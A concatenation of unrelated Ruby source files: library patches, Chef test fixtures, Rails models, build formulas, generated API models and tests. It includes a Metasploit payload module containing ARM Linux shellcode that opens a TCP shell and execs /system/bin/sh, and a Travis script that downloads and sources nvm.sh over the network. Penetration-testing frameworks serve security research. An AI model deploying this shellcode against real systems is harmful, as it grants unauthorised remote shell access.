"Host: #{@address}:#{@port}",
"Proxy-Authorization: NTLM #{Base64.strict_encode64(authenticate_message.serialize)}",
"Proxy-Connection: Keep-Alive",
].join("\r\n") + "\r\n\r\n")
HTTPResponse.read_new(plain_sock).value
end
# Returns {user: user, domain: domain}
def parse_proxy_user(proxy_user)
case proxy_user
when /(.+?)\\(.+)/ # domain\user
{user: $2, domain: $1}
when /(.+?)@(.+)/ # user@domain
{user: $1, domain: $2}
else
{user: proxy_user}
end
end
end
end
end
Net::HTTP.prepend(Net::HTTP::ProxyAuthenticateNTLM)
| 34.40708 | 122 | 0.579475 |
ed1df1a2ee12bc4447408fccaa155e7cc72aff75 | 91 | # desc "Explaining what the task does"
# task :easel_helpers do
# # Task goes here
# end
| 18.2 | 38 | 0.692308 |
1c770f06fde2c4f1439103b79c4f35db21ca6170 | 1,020 | nexus3_cleanup_policy 'integration_cleanup_policy' do
format 'raw'
criteria lastBlobUpdated: '604800', lastDownloaded: '259200'
end
nexus3_repo 'integration_repo' do
attributes storage: { blobStoreName: 'default', writePolicy: 'ALLOW_ONCE' }
repo_type 'rubygems-hosted'
end
nexus3_group 'integration_group' do
attributes storage: { blobStoreName: 'default', strictContentTypeValidation: true }
group_type 'rubygems-group'
end
# Use RutAuth because there is low chance that we actually enable it
nexus3_realm 'rutauth-realm' do
enable true
end
nexus3_role 'integration_role' do
description 'Role created during integration tests'
roles []
privileges []
end
nexus3_task 'integration_task' do
task_type 'script'
crontab '0 2 * * * ?'
properties({ 'language' => 'lang',
'source' => 'log.info("Hello task");' })
end
nexus3_user 'integration_user' do
password 'Secret'
first_name 'integration'
last_name 'user'
email '[email protected]'
roles ['integration_role']
end
| 24.878049 | 85 | 0.739216 |
6143f2cddaf534f8a95136dfaa88e16bad7034c0 | 2,721 | class IpBan < ApplicationRecord
belongs_to :creator, class_name: "User"
validate :validate_ip_addr
validates :reason, presence: true
before_save :create_mod_action
deletable
enum category: {
full: 0,
partial: 100
}, _suffix: "ban"
def self.ip_matches(ip_addr)
where("ip_addr >>= ?", ip_addr)
end
def self.hit!(category, ip_addr)
ip_ban = active.where(category: category).ip_matches(ip_addr).first
return false unless ip_ban
IpBan.increment_counter(:hit_count, ip_ban.id, touch: [:last_hit_at])
true
end
def self.search(params)
q = search_attributes(params, :id, :created_at, :updated_at, :ip_addr, :reason, :is_deleted, :category, :hit_count, :last_hit_at, :creator)
q = q.text_attribute_matches(:reason, params[:reason_matches])
case params[:order]
when /\A(created_at|updated_at|last_hit_at)(?:_(asc|desc))?\z/i
column = $1
dir = $2 || :desc
q = q.order(Arel.sql("#{column} #{dir} NULLS LAST")).order(id: :desc)
else
q = q.apply_default_order(params)
end
q
end
def create_mod_action
if new_record?
ModAction.log("#{creator.name} created ip ban for #{ip_addr}", :ip_ban_create)
elsif is_deleted? == true && is_deleted_was == false
ModAction.log("#{CurrentUser.user.name} deleted ip ban for #{ip_addr}", :ip_ban_delete)
elsif is_deleted? == false && is_deleted_was == true
ModAction.log("#{CurrentUser.user.name} undeleted ip ban for #{ip_addr}", :ip_ban_undelete)
end
end
def validate_ip_addr
if ip_addr.blank?
errors.add(:ip_addr, "is invalid")
elsif ip_addr.private? || ip_addr.loopback? || ip_addr.link_local?
errors.add(:ip_addr, "must be a public address")
elsif full_ban? && ip_addr.ipv4? && ip_addr.prefix < 24
errors.add(:ip_addr, "may not have a subnet bigger than /24")
elsif partial_ban? && ip_addr.ipv4? && ip_addr.prefix < 8
errors.add(:ip_addr, "may not have a subnet bigger than /8")
elsif full_ban? && ip_addr.ipv6? && ip_addr.prefix < 64
errors.add(:ip_addr, "may not have a subnet bigger than /64")
elsif partial_ban? && ip_addr.ipv6? && ip_addr.prefix < 20
errors.add(:ip_addr, "may not have a subnet bigger than /20")
elsif new_record? && IpBan.active.ip_matches(subnetted_ip).exists?
errors.add(:ip_addr, "is already banned")
end
end
def has_subnet?
(ip_addr.ipv4? && ip_addr.prefix < 32) || (ip_addr.ipv6? && ip_addr.prefix < 128)
end
def subnetted_ip
str = ip_addr.to_s
str += "/" + ip_addr.prefix.to_s if has_subnet?
str
end
def ip_addr=(ip_addr)
super(ip_addr.strip)
end
def self.available_includes
[:creator]
end
end
| 30.573034 | 143 | 0.668504 |
f89c745e61e752160d66c1d86f13bcb269969ad9 | 21 | # typed: true
yield
| 5.25 | 13 | 0.666667 |
187890f6fe29c6514e9b4234750ed84463e61291 | 737 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'adv_image_picker'
s.version = '0.3.1'
s.summary = 'An advanced image picker with crop'
s.description = <<-DESC
An advanced image picker with crop
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.pod_target_xcconfig = { "DEFINES_MODULE" => "YES" }
s.ios.deployment_target = '9.0'
end
| 30.708333 | 83 | 0.559023 |
08a941d68fd875f09c8c82cd122690eb70d0f902 | 175 | class Admin::DeviseAuthyController < Devise::DeviseAuthyController
layout "twofactor"
def after_authy_enabled_path_for(resource)
admin_dashboard_index_path
end
end
| 21.875 | 66 | 0.822857 |
26b25bf6ae6c07a141be8cf7748acb80023b3f37 | 36 | module LAMA
VERSION = '0.0.1'
end
| 9 | 19 | 0.638889 |
6a5b2e8cc5bacec3fc75e002d9aafe187cf6b666 | 1,940 | class Jenkins < Formula
desc "Extendable open source continuous integration server"
homepage "https://jenkins-ci.org"
url "http://mirrors.jenkins-ci.org/war/1.643/jenkins.war"
sha256 "b8c6387e56d04a0a4a7ec8d9dacd379fbd5d4001d01fdfcd443f9864809f9293"
head do
url "https://github.com/jenkinsci/jenkins.git"
depends_on "maven" => :build
end
bottle :unneeded
depends_on :java => "1.7+"
def install
if build.head?
ENV.java_cache
system "mvn", "clean", "install", "-pl", "war", "-am", "-DskipTests"
else
system "jar", "xvf", "jenkins.war"
end
libexec.install Dir["**/jenkins.war", "**/jenkins-cli.jar"]
bin.write_jar_script libexec/"jenkins.war", "jenkins"
bin.write_jar_script libexec/"jenkins-cli.jar", "jenkins-cli"
end
plist_options :manual => "jenkins"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/java</string>
<string>-Dmail.smtp.starttls.enable=true</string>
<string>-jar</string>
<string>#{opt_libexec}/jenkins.war</string>
<string>--httpListenAddress=127.0.0.1</string>
<string>--httpPort=8080</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
def caveats; <<-EOS.undent
Note: When using launchctl the port will be 8080.
EOS
end
test do
ENV["JENKINS_HOME"] = testpath
pid = fork do
exec "#{bin}/jenkins"
end
sleep 60
begin
assert_match /"mode":"NORMAL"/, shell_output("curl localhost:8080/api/json")
ensure
Process.kill("SIGINT", pid)
Process.wait(pid)
end
end
end
| 26.575342 | 106 | 0.618557 |
0137df95302c22b1ba863dbc4b6c8d3f36b6074f | 94 | FactoryBot.define do
factory :secret do
content { "MyText" }
user { nil }
end
end
| 13.428571 | 24 | 0.62766 |
18eff5bcc563d8e56a35adb8c3ef759d30e9df33 | 5,953 | =begin
#OpenAPI Petstore
#This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0-SNAPSHOT
=end
require 'date'
module Petstore
# Model for testing model with \"_class\" property
class ClassModel
attr_accessor :_class
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_class' => :'_class'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'_class' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Petstore::ClassModel` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Petstore::ClassModel`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'_class')
self._class = attributes[:'_class']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_class == o._class
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[_class].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
Petstore.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 30.065657 | 198 | 0.626071 |
1a6193bc41d4b3e18623a95077fb8cc2fc3993b0 | 1,084 | lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "jekyll-github-meta/version"
Gem::Specification.new do |spec|
spec.name = "jekyll-github-meta"
spec.summary = "Add meta data from GitHub account to site config"
spec.description = "Add meta data from GitHub account to site config"
spec.version = JekyllGithubMeta::VERSION
spec.authors = ["Jam Risser"]
spec.email = ["[email protected]"]
spec.homepage = "https://github.com/jamrizzi/jekyll-github-meta"
spec.licenses = ["MIT"]
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r!^(test|spec|features)/!) }
spec.require_paths = ["lib"]
spec.add_dependency "jekyll", "~> 3.0"
spec.add_dependency "octokit", "~> 4.8"
spec.add_dependency "jekyll-site-config", "~> 0.1"
spec.add_dependency "faraday-http-cache", "~> 2.0"
spec.add_development_dependency "rake", "~> 11.0"
spec.add_development_dependency "rspec", "~> 3.5"
spec.add_development_dependency "rubocop", "~> 0.52"
end
| 47.130435 | 105 | 0.663284 |
e27b724fd90cb02cc7f7e20f8fb1afc0f7e2bc1c | 4,136 | require 'spec_helper'
module VCAP::CloudController
describe ServiceDashboardClient do
let(:service_broker) { ServiceBroker.make }
let(:other_broker) { ServiceBroker.make }
let(:uaa_id) { 'claimed_client_id' }
it { is_expected.to have_timestamp_columns }
describe 'Associations' do
it { is_expected.to have_associated :service_broker }
end
describe 'Validations' do
it { is_expected.to validate_presence :uaa_id }
it { is_expected.to validate_uniqueness :uaa_id }
context 'when all fields are valid' do
let(:client) { ServiceDashboardClient.make_unsaved(service_broker: service_broker) }
it 'is valid' do
expect(client).to be_valid
end
end
end
describe '.find_clients_claimed_by_broker' do
before do
ServiceDashboardClient.claim_client_for_broker('client-1', service_broker)
ServiceDashboardClient.claim_client_for_broker('client-2', other_broker)
ServiceDashboardClient.claim_client_for_broker('client-3', service_broker)
end
it 'returns all clients claimed by the broker' do
results = ServiceDashboardClient.find_clients_claimed_by_broker(service_broker)
expect(results).to have(2).entries
expect(results.map(&:uaa_id)).to match_array ['client-1', 'client-3']
end
end
describe '.claim_client_for_broker' do
context 'when the client is unclaimed' do
it 'claims the client for the broker' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.to change {
ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker)
}.to(true)
end
end
context 'when a claim without a broker id exists' do
before do
ServiceDashboardClient.make(service_broker: nil, uaa_id: uaa_id)
end
it 'claims the client for the broker' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.to change {
ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker)
}.to(true)
end
end
context 'when the client is already claimed by another broker' do
before do
ServiceDashboardClient.claim_client_for_broker(uaa_id, other_broker)
end
it 'raises an exception' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.to raise_exception(Sequel::ValidationFailed)
end
end
context 'when the client is already claimed by the specified broker' do
before do
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
end
it 'does not change the fact that the client is claimed by the broker' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.not_to change {
ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker)
}
end
end
end
describe '.remove_claim_on_client' do
before do
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
end
it 'removes the claim' do
expect {
ServiceDashboardClient.remove_claim_on_client(uaa_id)
}.to change { ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker) }.to(false)
end
end
describe '.find_client_by_uaa_id' do
context 'when no clients with the specified uaa_id exist' do
it 'returns nil' do
expect(ServiceDashboardClient.find_client_by_uaa_id('some-uaa-id')).to be_nil
end
end
context 'when one client exists with the specified uaa_id' do
let!(:client) {
ServiceDashboardClient.make(uaa_id: 'some-uaa-id', service_broker: nil)
}
it 'returns the client' do
expect(ServiceDashboardClient.find_client_by_uaa_id('some-uaa-id')).to eq(client)
end
end
end
end
end
| 33.088 | 106 | 0.670696 |
e895746ca2f0b9194e748c55e3f8e939949d7a0d | 7,176 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module ValuesBasicArraysTests
def test_null
target = build(Arrow::NullArray.new(4))
assert_equal([nil] * 4, target.values)
end
def test_boolean
values = [true, nil, false]
target = build(Arrow::BooleanArray.new(values))
assert_equal(values, target.values)
end
def test_int8
values = [
-(2 ** 7),
nil,
(2 ** 7) - 1,
]
target = build(Arrow::Int8Array.new(values))
assert_equal(values, target.values)
end
def test_uint8
values = [
0,
nil,
(2 ** 8) - 1,
]
target = build(Arrow::UInt8Array.new(values))
assert_equal(values, target.values)
end
def test_int16
values = [
-(2 ** 15),
nil,
(2 ** 15) - 1,
]
target = build(Arrow::Int16Array.new(values))
assert_equal(values, target.values)
end
def test_uint16
values = [
0,
nil,
(2 ** 16) - 1,
]
target = build(Arrow::UInt16Array.new(values))
assert_equal(values, target.values)
end
def test_int32
values = [
-(2 ** 31),
nil,
(2 ** 31) - 1,
]
target = build(Arrow::Int32Array.new(values))
assert_equal(values, target.values)
end
def test_uint32
values = [
0,
nil,
(2 ** 32) - 1,
]
target = build(Arrow::UInt32Array.new(values))
assert_equal(values, target.values)
end
def test_int64
values = [
-(2 ** 63),
nil,
(2 ** 63) - 1,
]
target = build(Arrow::Int64Array.new(values))
assert_equal(values, target.values)
end
def test_uint64
values = [
0,
nil,
(2 ** 64) - 1,
]
target = build(Arrow::UInt64Array.new(values))
assert_equal(values, target.values)
end
def test_float
values = [
-1.0,
nil,
1.0,
]
target = build(Arrow::FloatArray.new(values))
assert_equal(values, target.values)
end
def test_double
values = [
-1.0,
nil,
1.0,
]
target = build(Arrow::DoubleArray.new(values))
assert_equal(values, target.values)
end
def test_binary
values = [
"\x00".b,
nil,
"\xff".b,
]
target = build(Arrow::BinaryArray.new(values))
assert_equal(values, target.values)
end
def test_tring
values = [
"Ruby",
nil,
"\u3042", # U+3042 HIRAGANA LETTER A
]
target = build(Arrow::StringArray.new(values))
assert_equal(values, target.values)
end
def test_date32
values = [
Date.new(1960, 1, 1),
nil,
Date.new(2017, 8, 23),
]
target = build(Arrow::Date32Array.new(values))
assert_equal(values, target.values)
end
def test_date64
values = [
DateTime.new(1960, 1, 1, 2, 9, 30),
nil,
DateTime.new(2017, 8, 23, 14, 57, 2),
]
target = build(Arrow::Date64Array.new(values))
assert_equal(values, target.values)
end
def test_timestamp_second
values = [
Time.parse("1960-01-01T02:09:30Z"),
nil,
Time.parse("2017-08-23T14:57:02Z"),
]
target = build(Arrow::TimestampArray.new(:second, values))
assert_equal(values, target.values)
end
def test_timestamp_milli
values = [
Time.parse("1960-01-01T02:09:30.123Z"),
nil,
Time.parse("2017-08-23T14:57:02.987Z"),
]
target = build(Arrow::TimestampArray.new(:milli, values))
assert_equal(values, target.values)
end
def test_timestamp_micro
values = [
Time.parse("1960-01-01T02:09:30.123456Z"),
nil,
Time.parse("2017-08-23T14:57:02.987654Z"),
]
target = build(Arrow::TimestampArray.new(:micro, values))
assert_equal(values, target.values)
end
def test_timestamp_nano
values = [
Time.parse("1960-01-01T02:09:30.123456789Z"),
nil,
Time.parse("2017-08-23T14:57:02.987654321Z"),
]
target = build(Arrow::TimestampArray.new(:nano, values))
assert_equal(values, target.values)
end
def test_time32_second
unit = Arrow::TimeUnit::SECOND
values = [
Arrow::Time.new(unit, 60 * 10), # 00:10:00
nil,
Arrow::Time.new(unit, 60 * 60 * 2 + 9), # 02:00:09
]
target = build(Arrow::Time32Array.new(:second, values))
assert_equal(values, target.values)
end
def test_time32_milli
unit = Arrow::TimeUnit::MILLI
values = [
Arrow::Time.new(unit, (60 * 10) * 1000 + 123), # 00:10:00.123
nil,
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1000 + 987), # 02:00:09.987
]
target = build(Arrow::Time32Array.new(:milli, values))
assert_equal(values, target.values)
end
def test_time64_micro
unit = Arrow::TimeUnit::MICRO
values = [
# 00:10:00.123456
Arrow::Time.new(unit, (60 * 10) * 1_000_000 + 123_456),
nil,
# 02:00:09.987654
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000 + 987_654),
]
target = build(Arrow::Time64Array.new(:micro, values))
assert_equal(values, target.values)
end
def test_time64_nano
unit = Arrow::TimeUnit::NANO
values = [
# 00:10:00.123456789
Arrow::Time.new(unit, (60 * 10) * 1_000_000_000 + 123_456_789),
nil,
# 02:00:09.987654321
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000_000 + 987_654_321),
]
target = build(Arrow::Time64Array.new(:nano, values))
assert_equal(values, target.values)
end
def test_decimal128
values = [
BigDecimal("92.92"),
nil,
BigDecimal("29.29"),
]
data_type = Arrow::Decimal128DataType.new(8, 2)
target = build(Arrow::Decimal128Array.new(data_type, values))
assert_equal(values, target.values)
end
def test_decimal256
values = [
BigDecimal("92.92"),
nil,
BigDecimal("29.29"),
]
data_type = Arrow::Decimal256DataType.new(38, 2)
target = build(Arrow::Decimal256Array.new(data_type, values))
assert_equal(values, target.values)
end
def test_month_interval
values = [
1,
nil,
12,
]
target = build(Arrow::MonthIntervalArray.new(values))
assert_equal(values, target.values)
end
end
class ValuesArrayBasicArraysTest < Test::Unit::TestCase
include ValuesBasicArraysTests
def build(array)
array
end
end
class ValuesChunkedArrayBasicArraysTest < Test::Unit::TestCase
include ValuesBasicArraysTests
def build(array)
Arrow::ChunkedArray.new([array])
end
end
| 23.45098 | 77 | 0.620262 |
624bd34bc1b31cfa9cc8903679ec1a45e8022a20 | 175 | class CreateGames < ActiveRecord::Migration[5.0]
def change
create_table :games do |t|
t.string :name
t.integer :price
t.timestamps
end
end
end
| 15.909091 | 48 | 0.64 |
39aecc0b09bbc528df6902c9709538dd48e3e2b5 | 4,108 | require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '',
'Description' => 'Connect to target and spawn a command shell',
'Author' => ['civ', 'hal'],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'RHOST' => [ 208, 'ADDR' ],
'LPORT' => [ 206, 'n' ],
},
'Payload' =>
[
# socket
0xe3a00002, # mov r0, #2
0xe3a01001, # mov r1, #1
0xe3a02006, # mov r2, #6
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe2877019, # add r7, r7, #25
0xef000000, # svc 0x00000000
0xe1a06000, # mov r6, r0
# bind
0xe28f10A4, # 1dr r1, pc, #172 ; 0x9C
0xe3a02010, # mov r2, #16
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe287701a, # add r7, r7, #26
0xef000000, # svc 0x00000000
# listen
0xe1a00006, # mov r0, r6
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe287701c, # add r7, r7, #28
0xef000000, # svc 0x00000000
# accept
0xe1a00006, # mov r0, r6
0xe0411001, # sub r1, r1, r1
0xe0422002, # sub r2, r2, r2
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe287701d, # add r7, r7, #29
0xef000000, # svc 0x00000000
# dup
0xe1a06000, # mov r6, r0
0xe3a01002, # mov r1, #2
0xe1a00006, # mov r0, r6
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
0xe2511001, # subs r1, r1, #1
0x5afffffa, # bpl 8c <.text+0x8c>
# execve("/system/bin/sh", args, env)
0xe28f0048, # add r0, pc, #72 ; 0xe40
0xe0244004, # eor r4, r4, r4
0xe92d0010, # push {r4}
0xe1a0200d, # mov r2, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe92d0010, # push {r4}
0xe59f1048, # ldr r1, [pc, #72] ; 8124 <env+0xe8>
0xe92d0002, # push {r1}
0xe92d2000, # push {sp}
0xe1a0100d, # mov r1, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe3a0700b, # mov r7, #11 ; 0xeb
0xef000000, # svc 0x00000000
# exit(0)
0xe3a00000, # mov r0, #0 ; 0x0
0xe3a07001, # mov r7, #1 ; 0x1
0xef000000, # svc 0x00000000
# <af>:
0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
# <shell>:
0x00000000, # .word 0x00000000 ; the shell goes here!
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
# <arg>:
0x00000000 # .word 0x00000000 ; the args!
].pack("V*")
}
))
# Register command execution options
register_options(
[
OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
], self.class)
end
def generate
p = super
sh = datastore['SHELL']
if sh.length >= 16
raise ArgumentError, "The specified shell must be less than 16 bytes."
end
p[212, sh.length] = sh
arg = datastore['SHELLARG']
if arg
if arg.length >= 4
raise ArgumentError, "The specified shell argument must be less than 4 bytes."
end
p[228, arg.length] = arg
end
p
end
end
| 28.727273 | 84 | 0.525316 |
bf90063a033c03efcef653dfec71234e9fc7aa8f | 9,148 | module Travis
module Build
class Script
class NodeJs < Script
DEFAULT_VERSION = '0.10'
YARN_REQUIRED_NODE_VERSION = '4'
NPM_QUIET_TREE_VERSION = '5'
NPM_CI_CMD_VERSION = '5.8.0'
def export
super
if node_js_given_in_config?
sh.export 'TRAVIS_NODE_VERSION', version, echo: false
end
end
def setup
super
prepend_path './node_modules/.bin'
convert_legacy_nodejs_config
update_nvm
nvm_install
npm_disable_prefix
npm_disable_spinner
npm_disable_progress
npm_disable_strict_ssl unless npm_strict_ssl?
setup_npm_cache if use_npm_cache?
install_yarn
end
def announce
super
if iojs_3_plus?
sh.cmd 'echo -e "#include <array>\nstd::array<int, 1> arr = {0}; int main() {return 0;}" > /tmp/foo-$$.cpp', echo: false
sh.raw "if ! ($CXX -std=c++11 -o /dev/null /tmp/foo-$$.cpp >&/dev/null || g++ -std=c++11 -o /dev/null /tmp/foo-$$.cpp >&/dev/null); then"
sh.echo "Starting with io.js 3 and Node.js 4, building native extensions requires C++11-compatible compiler, which seems unavailable on this VM. Please read https://docs.travis-ci.com/user/languages/javascript-with-nodejs#Node.js-v4-(or-io.js-v3)-compiler-requirements.", ansi: :yellow
sh.raw "fi"
sh.cmd 'rm -f /tmp/foo-$$.cpp', echo: false
end
sh.cmd 'node --version'
sh.cmd 'npm --version'
sh.cmd 'nvm --version'
sh.if "-f yarn.lock" do
sh.cmd 'yarn --version'
sh.cmd 'hash -d yarn', echo: false
end
end
def install
sh.if '-f package.json' do
sh.if "-f yarn.lock" do
sh.if yarn_req_not_met do
npm_install config[:npm_args]
end
sh.else do
sh.cmd "yarn", retry: true, fold: 'install'
end
end
sh.else do
npm_install config[:npm_args]
end
end
end
def script
sh.if '-f package.json' do
sh.if "-f yarn.lock" do
sh.if yarn_req_not_met do
sh.cmd 'npm test'
end
sh.else do
sh.cmd 'yarn test'
end
end
sh.else do
sh.cmd 'npm test'
end
end
sh.else do
sh.cmd 'make test'
end
end
def cache_slug
super << '--node-' << version
end
def setup_cache
if data.cache?(:yarn)
sh.fold 'cache.yarn' do
sh.echo ''
directory_cache.add '$HOME/.cache/yarn'
end
end
if data.cache?(:npm)
sh.fold 'cache.npm' do
sh.echo ''
directory_cache.add '$HOME/.npm'
end
end
end
def use_directory_cache?
super || data.cache?(:yarn) || data.cache?(:npm)
end
private
def convert_legacy_nodejs_config
# TODO deprecate :nodejs
# some old projects use language: nodejs. MK.
if config[:nodejs] && !config[:node_js]
config[:node_js] = config[:nodejs]
end
end
def node_js_given_in_config?
!!config[:node_js]
end
def version
@version ||= begin
version = Array(config[:node_js]).first
version == 0.1 ? '0.10' : version.to_s
end
end
def nvm_install
if node_js_given_in_config?
use_nvm_version
else
use_nvm_default
end
end
def use_nvm_default
sh.if '-f .nvmrc' do
sh.echo "Using nodejs version from .nvmrc", ansi: :yellow
install_version '$(< .nvmrc)'
end
sh.else do
install_version DEFAULT_VERSION
end
end
def use_nvm_version
install_version version
end
def install_version(ver)
sh.fold "nvm.install" do
sh.cmd "nvm install #{ver}", assert: false, timing: true
sh.if '$? -ne 0' do
sh.echo "Failed to install #{ver}. Remote repository may not be reachable.", ansi: :red
sh.echo "Using locally available version #{ver}, if applicable."
sh.cmd "nvm use #{ver}", assert: false, timing: false
sh.if '$? -ne 0' do
sh.echo "Unable to use #{ver}", ansi: :red
sh.cmd "false", assert: true, echo: false, timing: false
end
end
sh.export 'TRAVIS_NODE_VERSION', ver, echo: false
end
end
def update_nvm
return if app_host.empty?
sh.echo "Updating nvm", ansi: :yellow, timing: false
nvm_dir = "$HOME/.nvm"
sh.raw "mkdir -p #{nvm_dir}"
sh.raw "curl -s -o #{nvm_dir}/nvm.sh https://#{app_host}/files/nvm.sh".untaint, assert: false
sh.raw "curl -s -o #{nvm_dir}/nvm-exec https://#{app_host}/files/nvm-exec".untaint, assert: false
sh.raw "chmod 0755 #{nvm_dir}/nvm.sh #{nvm_dir}/nvm-exec", assert: true
sh.raw "source #{nvm_dir}/nvm.sh", assert: false
end
def npm_disable_prefix
